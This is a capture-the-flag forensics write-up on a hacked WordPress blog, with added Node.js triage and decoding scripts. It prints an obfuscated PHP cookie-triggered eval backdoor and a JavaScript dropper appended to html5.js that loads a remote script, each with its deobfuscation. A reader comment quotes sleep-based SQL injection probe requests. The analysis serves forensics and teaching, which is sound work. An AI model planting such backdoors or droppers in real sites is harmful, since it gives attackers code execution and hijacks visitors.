CSAW14 – Fluffy no more (Forensic 300)

September 24, 2014

Description

OH NO WE’VE BEEN HACKED!!!!!! — said the Eye Heart Fluffy Bunnies Blog owner. Life was grand for the fluff fanatic until one day the site’s users started to get attacked! Apparently fluffy bunnies are not just a love of fun furry families but also furtive foreign governments. The notorious “Forgotten Freaks” hacking group was known to be targeting high powered politicians. Were the cute bunnies the next in their long list of conquests!??
Well… The fluff needs your stuff. I’ve pulled the logs from the server for you along with a backup of its database and configuration. Figure out what is going on!
Written by brad_anton

Here we have a WordPress blog that has been compromised.

A (quick) look through the “html” folder (the web root) turns up something in the uploads tree that should never be there: a PHP file, wp-content/uploads/wysija/themes/weblizer/template.php, sitting among the mail plugin’s theme assets (uploads should only ever hold static content):

<?php
 $hije = str_replace("ey","","seyteyrey_reyeeypleyaeyceye");
 $andp="JsqGMsq9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSsqk9PSdoYScgJisqYgsqJsqGMoJ";
 $rhhm="nsqKSwgam9pbihhcnJheV9zbGljZSgkYSwksqYygkYSksqtMykpKSksqpO2VjaG8sqgJsqzwvJy4kay4nPic7fQ==";
 $pvqw="GEpPjMpeyRrPSdja2l0JztlY2hvICc8Jy4kaysq4nPicsq7ZXZhbChsqiYXNlNjRfZGVjb2RlKHByZsqWdfcmVw";
 $wfrm="bGFjZShhcnsqJheSsqgsqnsqL1teXHcsq9XHNdLycsJy9ccy8nKSwgYsqXJyYXksqoJycsJyssq";
 $vyoh = $hije("n", "", "nbnansne64n_ndnecode");
 $bpzy = $hije("z","","zczreaztzez_zfzuznzcztzizon");
 $xhju = $bpzy('', $vyoh($hije("sq", "", $andp.$pvqw.$wfrm.$rhhm))); $xhju();
 ?>

After deobfuscation:

<?php
 $c='count';$a=$_COOKIE;              // every cookie of the request, in the order the browser sent them
 if(reset($a)=='ha' && $c($a)>3){     // gate: first cookie value is 'ha' and there are at least four cookies
   $k='ckit';
   echo '<'.$k.'>';                   // output is wrapped in <ckit>...</ckit> so the client can cut it out of the page
   eval(
     base64_decode(
       preg_replace(
         array('/[^\w=\s]/','/\s/'),  // 1) drop anything that is not [A-Za-z0-9_], '=' or whitespace (junk padding)
         array('','+'),               // 2) turn whitespace back into '+' (PHP's cookie decoding had turned '+' into a space)
         join(
           array_slice($a,$c($a)-3))  // the last three cookie values, concatenated, carry the base64-encoded PHP
         )
       )
   );                                 // ...which is then run as PHP code
   echo '</'.$k.'>';
 }
?>

So whoever requests this page with the right cookies (first cookie value “ha”, more than three cookies, and base64-encoded PHP spread over the last three) gets arbitrary code execution on the server, with the output handed back between <ckit> and </ckit> tags. Every other visitor just gets an empty page, which is what makes this backdoor hard to spot from the outside. The commenter below identifies it as a weevely agent, and the layout (function names reassembled with str_replace, cookie transport, custom delimiter tags) fits.
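access.log does not record cookies, so to see what such a request actually ran you need the raw request (a PCAP, a proxy log or a mod_security audit log). The following is an added example, not part of the write-up, that transcribes the agent’s gate and transport into Node.js and turns a captured Cookie header back into the PHP the agent would have passed to eval(). The sample header and its payload are constructed for the example, and the way PHP fills $_COOKIE is approximated (URL-decoding, header order, first value wins for a repeated name), which is an assumption rather than a full cookie parser.

```javascript
'use strict';
// Added example (not part of the write-up): recover the PHP that the template.php agent
// would eval() from a request's Cookie header, by transcribing the agent's own logic.
// Useful with a PCAP or mod_security audit log, since access.log does not record cookies.

// URL-decode one cookie token the way PHP does for $_COOKIE: '+' becomes a space, %xx is
// decoded; a malformed %xx sequence is kept as is instead of aborting the whole parse.
function urlDecode(token) {
  const plusFixed = token.replace(/\+/g, ' ');
  try {
    return decodeURIComponent(plusFixed);
  } catch (e) {
    return plusFixed;
  }
}

// Approximation of PHP's $_COOKIE (assumption): split on ';', the first '=' separates name
// and value, header order is kept and the first occurrence wins when a name repeats.
function parseCookieHeader(header) {
  const jar = new Map();
  for (const part of header.split(';')) {
    const token = part.trim();
    if (!token) continue;
    const eq = token.indexOf('=');
    const name = urlDecode(eq === -1 ? token : token.slice(0, eq));
    const value = eq === -1 ? '' : urlDecode(token.slice(eq + 1));
    if (!jar.has(name)) jar.set(name, value);
  }
  return jar;
}

// The agent's gate and transport, step for step from the deobfuscated PHP:
//   reset($a)=='ha' && count($a)>3      first cookie value is 'ha', at least four cookies
//   join(array_slice($a,count($a)-3))   the last three cookie values, concatenated
//   preg_replace('/[^\w=\s]/','')       junk outside [A-Za-z0-9_=] and whitespace is dropped
//   preg_replace('/\s/','+')            whitespace back to '+', which PHP's cookie decoding
//                                       had turned into a space
//   base64_decode(...)                  the PHP source handed to eval()
// Returns null when the gate is not satisfied (the agent then serves an empty page).
function recoverAgentPayload(cookieHeader) {
  const values = [...parseCookieHeader(cookieHeader).values()];
  if (values.length <= 3 || values[0] !== 'ha') return null;
  const b64 = values.slice(-3).join('').replace(/[^\w=\s]/g, '').replace(/\s/g, '+');
  return Buffer.from(b64, 'base64').toString('latin1');
}

// Constructed sample request (not from the challenge). The payload  if(1 > 0) system('id');
// base64-encodes to aWYoMSA+IDApIHN5c3RlbSgnaWQnKTs= ; it is split over the last three
// cookies, the '+' travels as a space, and '-' / '!' are junk that the first regex discards.
const SAMPLE_COOKIE_HEADER =
  'PHPSESSID=ha; lang=en; a=aWYoMSA IDAp; b=IHN5c3-Rl!bSgn; c=aWQnKTs=';

// An ordinary WordPress visitor (constructed): the gate is not satisfied, nothing runs.
const BENIGN_COOKIE_HEADER =
  'wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1410897774';

console.log(recoverAgentPayload(SAMPLE_COOKIE_HEADER));   // if(1 > 0) system('id');
console.log(recoverAgentPayload(BENIGN_COOKIE_HEADER));   // null
```

Note that the first regex also strips ‘/’, so only payloads whose base64 contains no ‘/’ survive the transport unchanged; for plain-ASCII PHP that character only arises from a ‘?’ or DEL byte in the third position of a base64 group, which is why the agent gets away with it.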

Let’s check access.log to see whether anyone requested it:

7534: 192.168.127.140 - - [16/Sep/2014:20:42:54 +0000] "POST /wp-admin/admin-post.php?page=wysija_campaigns&action=themes HTTP/1.1" 302 385 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
7535: 192.168.127.140 - - [16/Sep/2014:20:42:54 +0000] "GET /wp-content/uploads/wysija/themes/weblizer/template.php HTTP/1.1" 200 165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

So someone at 192.168.127.140 sent a POST to the MailPoet (wysija) theme-upload action of admin-post.php (answered with a 302) and, in the very same second, fetched the freshly dropped template.php, which answered 200 with a 165-byte page. That is the upload path of the MailPoet vulnerability Sucuri wrote up in July 2014 (linked in the comments below): the plugin unpacked an attacker-supplied theme zip under wp-content/uploads/wysija/themes/ without a real authentication check, so anyone could plant a PHP file there. What did the attacker do next?
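The same two-step pattern as a reusable triage check, written for this page as an added example in Node.js (not from the original post or the challenge files). It parses Apache combined-format lines, pairs a theme-upload POST with later requests for server-side code under uploads from the same client, and separately lists every such request, because PHP under uploads is suspect on its own. The regular expressions are my own; the log lines are constructed for the example, and only the two marked ones reproduce entries quoted above.

```javascript
'use strict';
// Added example (not part of the write-up): a triage pass over an Apache combined-format
// access log that flags the two-step pattern above, a POST to the MailPoet (wysija) theme
// upload action followed by a request for a .php file under wp-content/uploads from the same
// client, and independently every hit on server-side code under uploads, which should not
// exist at all. The patterns are my own; the log lines are constructed for the example and
// only the two marked ones reproduce entries quoted in the write-up.

// ip, user, time, method, path, status, bytes, referer, user-agent of a combined-format line.
const COMBINED_LINE = /^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/;

// MailPoet's theme-upload action on admin-post.php (query parameters in any order).
const WYSIJA_THEME_UPLOAD = /^\/wp-admin\/admin-post\.php\?(?=.*\bpage=wysija_campaigns\b)(?=.*\baction=themes\b)/;

// Server-side code under the uploads tree, with or without a query string.
const CODE_UNDER_UPLOADS = /^\/wp-content\/uploads\/.*\.(php\d?|phtml|phar)(\?|$)/i;

function parseAccessLog(text) {
  const entries = [];
  for (const line of text.split('\n')) {
    const m = COMBINED_LINE.exec(line.trim());
    if (!m) continue;                       // blank or non-combined lines are skipped
    entries.push({
      ip: m[1], user: m[2], time: m[3], method: m[4], path: m[5],
      status: Number(m[6]), bytes: m[7] === '-' ? 0 : Number(m[7]),
      referer: m[8], userAgent: m[9],
    });
  }
  return entries;
}

function triage(text) {
  const uploadsByIp = new Map();   // client -> time of its first theme-upload POST
  const codeUnderUploads = [];     // every request for .php/.phtml/.phar under uploads
  const uploadThenHit = [];        // such a request from a client that uploaded a theme before
  for (const e of parseAccessLog(text)) {
    if (e.method === 'POST' && WYSIJA_THEME_UPLOAD.test(e.path) && !uploadsByIp.has(e.ip)) {
      uploadsByIp.set(e.ip, e.time);
    }
    if (CODE_UNDER_UPLOADS.test(e.path)) {
      codeUnderUploads.push(e);
      if (uploadsByIp.has(e.ip)) {
        uploadThenHit.push({ ip: e.ip, uploadedAt: uploadsByIp.get(e.ip), hitAt: e.time,
                             path: e.path.split('?')[0], status: e.status, bytes: e.bytes });
      }
    }
  }
  return { codeUnderUploads, uploadThenHit };
}

// Constructed sample log; the two marked lines are the ones quoted in the write-up.
const SAMPLE_ACCESS_LOG = [
  '192.168.127.140 - - [16/Sep/2014:20:41:10 +0000] "GET /wp-login.php HTTP/1.1" 200 4102 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
  '192.168.127.140 - - [16/Sep/2014:20:42:54 +0000] "POST /wp-admin/admin-post.php?page=wysija_campaigns&action=themes HTTP/1.1" 302 385 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',  // from the write-up
  '192.168.127.140 - - [16/Sep/2014:20:42:54 +0000] "GET /wp-content/uploads/wysija/themes/weblizer/template.php HTTP/1.1" 200 165 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',  // from the write-up
  '10.0.0.5 - - [16/Sep/2014:20:45:01 +0000] "GET /wp-content/uploads/2014/09/bunny.jpg HTTP/1.1" 200 51234 "http://fluffy.example/" "Mozilla/5.0"',
  '192.168.127.140 - - [16/Sep/2014:20:46:12 +0000] "GET /wp-content/uploads/wysija/themes/weblizer/template.php HTTP/1.1" 200 2210 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
  '203.0.113.9 - - [17/Sep/2014:02:13:40 +0000] "GET /wp-content/uploads/wysija/themes/weblizer/template.php?x=1 HTTP/1.1" 200 0 "-" "curl/7.35.0"',
].join('\n');

for (const f of triage(SAMPLE_ACCESS_LOG).uploadThenHit) {
  console.log(`${f.ip} uploaded a wysija theme at ${f.uploadedAt}, then hit ${f.path} at ${f.hitAt} (${f.status}, ${f.bytes} bytes)`);
}
```

On the sample the pairing reports the two hits from 192.168.127.140, while the plain list also catches the third client that only ever requested the shell; in a real investigation that second list is where you find the operator’s other addresses.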

Looking in /var/log/auth.log, there is something interesting: a sudo session in which a JavaScript file of the active twentythirteen theme is opened as root in vi:

Sep 17 19:20:09 ubuntu sudo: ubuntu : TTY=pts/0 ; PWD=/home/ubuntu/CSAW2014-WordPress/var/www ; USER=root ; COMMAND=/usr/bin/vi /var/www/html/wp-content/themes/twentythirteen/js/html5.js

So let’s have a look at this file. Comparing it with the original html5shiv (https://code.google.com/p/html5shiv/source/browse/trunk/html5.js?r=32) shows that some code was appended at the end:

var g = "ti";
var c = "HTML Tags";
var f = ". li colgroup br src datalist script option .";
f = f.split(" ");
c = "";
k = "/";
m = f[6];
for (var i = 0; i < f.length; i++) {
 c += f[i].length.toString();
}
v = f[0];
x = "\'ht";
b = f[4];
f = 2541 * 6 - 35 + 46 + 12 - 15269;
c += f.toString();
f = (56 + 31 + 68 * 65 + 41 - 548) / 4000 - 1;
c += f.toString();
f = "";
c = c.split("");
var w = 0;
u = "s";
for (var i = 0; i < c.length; i++) {
 if (((i == 3 || i == 6) && w != 2) || ((i == 8) && w == 2)) {
 f += String.fromCharCode(46);
 w++;
 }
 f += c[i];
}
i = k + "anal";
document.write("<" + m + " " + b + "=" + x + "tp:" + k + k + f + i + "y" + g + "c" + u + v + "j" + u + "\'>\</" + m + "\>");

After deobfuscation:

<script src='http://128.238.66.100/analytics.js'></script>

So now we look at that JavaScript (a whois on 128.238.66.100 shows the address belongs to “United States Brooklyn Polytechnic University”, i.e. NYU-Poly, which runs CSAW, so we are on the right track 😉).
It looks like a normal analytics script, but in the middle something is hidden:

var _0x91fe = ["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66", "\x5F\x73\x65\x6C\x66", "\x6F\x70\x65\x6E"];
window[_0x91fe[2]](_0x91fe[0], _0x91fe[1]);

After deobfuscation:

window["open"]("http://128.238.66.100/announcement.pdf", "_self");   // i.e. window.open(...) with target _self: the visitor's own tab is sent to the PDF
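Rather than trace the string arithmetic by hand, both stages can be run inside a recording stand-in for document and window and asked what they inject. The following is an added example, not part of the write-up or of the challenge files: it embeds the two snippets quoted above verbatim (the html5.js tail and the hidden part of analytics.js), runs them with new Function, and reports every document.write and window.open. The stub covers only the calls these two samples make, which is an assumption; it throws on anything else, so a dropper that uses other DOM APIs shows up as an error instead of silently producing nothing.

```javascript
'use strict';
// Added example (not part of the write-up or the challenge files): run the two injected
// scripts inside a recording stand-in for `document` and `window` and read off what they
// try to inject. The two sources are copied verbatim from the html5.js tail and from the
// hidden part of analytics.js quoted in the write-up; the stub only implements the calls
// these two samples make (assumption) and makes any other use visible by throwing.

// Stage 1: the code appended to wp-content/themes/twentythirteen/js/html5.js.
const HTML5JS_TAIL = String.raw`
var g = "ti";
var c = "HTML Tags";
var f = ". li colgroup br src datalist script option .";
f = f.split(" ");
c = "";
k = "/";
m = f[6];
for (var i = 0; i < f.length; i++) {
 c += f[i].length.toString();
}
v = f[0];
x = "\'ht";
b = f[4];
f = 2541 * 6 - 35 + 46 + 12 - 15269;
c += f.toString();
f = (56 + 31 + 68 * 65 + 41 - 548) / 4000 - 1;
c += f.toString();
f = "";
c = c.split("");
var w = 0;
u = "s";
for (var i = 0; i < c.length; i++) {
 if (((i == 3 || i == 6) && w != 2) || ((i == 8) && w == 2)) {
 f += String.fromCharCode(46);
 w++;
 }
 f += c[i];
}
i = k + "anal";
document.write("<" + m + " " + b + "=" + x + "tp:" + k + k + f + i + "y" + g + "c" + u + v + "j" + u + "\'>\</" + m + "\>");
`;

// Stage 2: the hidden part of http://128.238.66.100/analytics.js.
const ANALYTICS_HIDDEN = String.raw`
var _0x91fe = ["\x68\x74\x74\x70\x3A\x2F\x2F\x31\x32\x38\x2E\x32\x33\x38\x2E\x36\x36\x2E\x31\x30\x30\x2F\x61\x6E\x6E\x6F\x75\x6E\x63\x65\x6D\x65\x6E\x74\x2E\x70\x64\x66", "\x5F\x73\x65\x6C\x66", "\x6F\x70\x65\x6E"];
window[_0x91fe[2]](_0x91fe[0], _0x91fe[1]);
`;

// Wrap an object of stub methods so that any property the sample touches beyond those
// throws a descriptive error rather than silently yielding undefined.
function guarded(name, methods) {
  return new Proxy(methods, {
    get(target, prop) {
      if (prop in target) return target[prop];
      throw new Error(`sample used ${name}.${String(prop)}, which is not stubbed`);
    },
  });
}

// Run one sample with the stubs and return everything it wrote or opened. new Function
// yields a sloppy-mode function, so the sample's implicit globals (k, m, v, ...) behave as
// they would in a browser.
function runInStubDom(source) {
  const log = { writes: [], opens: [] };
  const document = guarded('document', {
    write: (html) => { log.writes.push(String(html)); },
    writeln: (html) => { log.writes.push(String(html) + '\n'); },
  });
  const window = guarded('window', {
    open: (url, target) => { log.opens.push({ url: String(url), target: String(target) }); return null; },
  });
  new Function('document', 'window', source)(document, window);
  return log;
}

// Pull the src= targets out of any <script> tags the sample wrote into the page.
function extractScriptSources(writes) {
  const re = /<script\b[^>]*\bsrc\s*=\s*(["'])(.*?)\1/gi;
  const sources = [];
  for (const html of writes) {
    for (const m of html.matchAll(re)) sources.push(m[2]);
  }
  return sources;
}

const stage1 = runInStubDom(HTML5JS_TAIL);
const stage2 = runInStubDom(ANALYTICS_HIDDEN);
console.log('html5.js injects:', extractScriptSources(stage1.writes));   // [ 'http://128.238.66.100/analytics.js' ]
console.log('analytics.js calls:', stage2.opens);                       // [ { url: 'http://128.238.66.100/announcement.pdf', target: '_self' } ]
```

Run it with node; it prints the injected script URL and the window.open call. new Function does not isolate the sample from the process it runs in, so use this only on samples you have already read, or inside a throwaway container.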

So let’s open the PDF!

Still no flag… Let’s go deeper. Opening the file in PDFStreamDumper reveals another piece of obfuscated JavaScript in one of its streams:

var _0xee0b = ["\x59\x4F\x55\x20\x44\x49\x44\x20\x49\x54\x21\x20\x43\x4F\x4E\x47\x52\x41\x54\x53\x21\x20\x66\x77\x69\x77\x2C\x20\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x20\x6F\x62\x66\x75\x73\x63\x61\x74\x69\x6F\x6E\x20\x69\x73\x20\x73\x6F\x66\x61\x20\x6B\x69\x6E\x67\x20\x64\x75\x6D\x62\x20\x20\x3A\x29\x20\x6B\x65\x79\x7B\x54\x68\x6F\x73\x65\x20\x46\x6C\x75\x66\x66\x79\x20\x42\x75\x6E\x6E\x69\x65\x73\x20\x4D\x61\x6B\x65\x20\x54\x75\x6D\x6D\x79\x20\x42\x75\x6D\x70\x79\x7D"];
var y = _0xee0b[0];

After another (and last) deobfuscation, the string reads:
YOU DID IT! CONGRATS! fwiw, javascript obfuscation is sofa king dumb  :) key{Those Fluffy Bunnies Make Tummy Bumpy}

and the text in the braces is the flag:

flag{Those Fluffy Bunnies Make Tummy Bumpy}

2 Responses to “CSAW14 – Fluffy no more (Forensic 300)”

  1. The file \var\www\html\wp-content\uploads\wysija\themes\weblizer\template.php ?
    It appears to me like they got rooted and they were able to install weevely. I’m pretty sure that’s the shell they have installed.

    What do you think? How do you think they got rooted?

    There are a lot of entries in the apache log file suggesting an attack:

    192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=1+or+sleep%287%29%23 HTTP/1.1" 301 422 "-" "Python-httplib2/0.7.4 (gzip)"
    192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%22+or+sleep%287%29%23 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
    192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%27+or+sleep%287%29%23 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
    192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%22+or+sleep%287%29%3D%22 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"
    192.168.127.137 - - [16/Sep/2014:14:41:08 +0000] "GET /?page_id=%27+or+sleep%287%29%3D%27 HTTP/1.1" 200 2852 "-" "Python-httplib2/0.7.4 (gzip)"

    Which one, in the whole log, was able to upload the weevely payload, do you think?

  2. Hi Mike,
    you can check the other write-up here http://sugarstack.io/csaw2014-fluffy-no-more/ and the vulnerability in the MailPoet plugin http://blog.sucuri.net/2014/07/mailpoet-vulnerability-exploited-in-the-wild-breaking-thousands-of-wordpress-sites.html
    He came to the same conclusion with the template file but couldn’t find the shell either.
